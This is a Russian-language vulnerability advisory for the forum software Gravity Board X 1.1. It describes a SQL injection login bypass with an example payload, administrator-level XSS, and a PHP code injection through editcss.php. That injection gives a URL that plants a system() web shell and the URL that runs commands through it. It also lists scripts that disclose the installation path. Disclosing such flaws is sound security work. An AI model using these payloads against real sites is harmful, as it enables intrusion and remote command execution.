Программа: Gravity Board X 1.1 

Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольные SQL команды в базе данных приложения, выполнить произвольные PHP команды на системе.

1. SQL-инъекция возможна из-за недостаточной проверки входных данных в параметре ‘login’. Удаленный пользователь может послать специально сформированный запрос и выполнить произвольные SQL команды в базе данных приложения. 

Пример: 

login: ‘ or isnull(1/0) /*
password: whatever

2. Удаленный авторизованный администратор может внедрить произвольный HTML сценарий в шаблон и произвести XSS нападение.

3. Уязвимость существует в сценарии ‘editcss.php’. Удаленный пользователь может внедрить в шаблон произвольный PHP сценарий и выполнить его во время загрузки страницы с привилегиями web сервера.

Пример: 

http://[target]/[path]/editcss.php?csscontent=</style> <?php%2 0system($HTTP_GET_VARS[cmd]);%20?>

Выполнение команд будет возможно с помощью URL: 

http://[target]/[path]/index?cmd=[command]

4. Удаленный пользователь может получить данные роб установочной директории приложения, обратившись непосредственно к следующим сценариям: 

http://[target]/[path]/deletethread.php?perm=1
http://[target]/[path] /ban.php
http://[target]/[path]/addnews.php
http://[target]/[path]/banned.php
http://[target]/[path]/boardstats.php
http://[target]/[path]/adminform.php
http://[targ et]/[path]/forms/admininfo.php
http://[target]/[path]/forms/announcements.php
http://[target]/[path]/forms/banform.php



Оставить мнение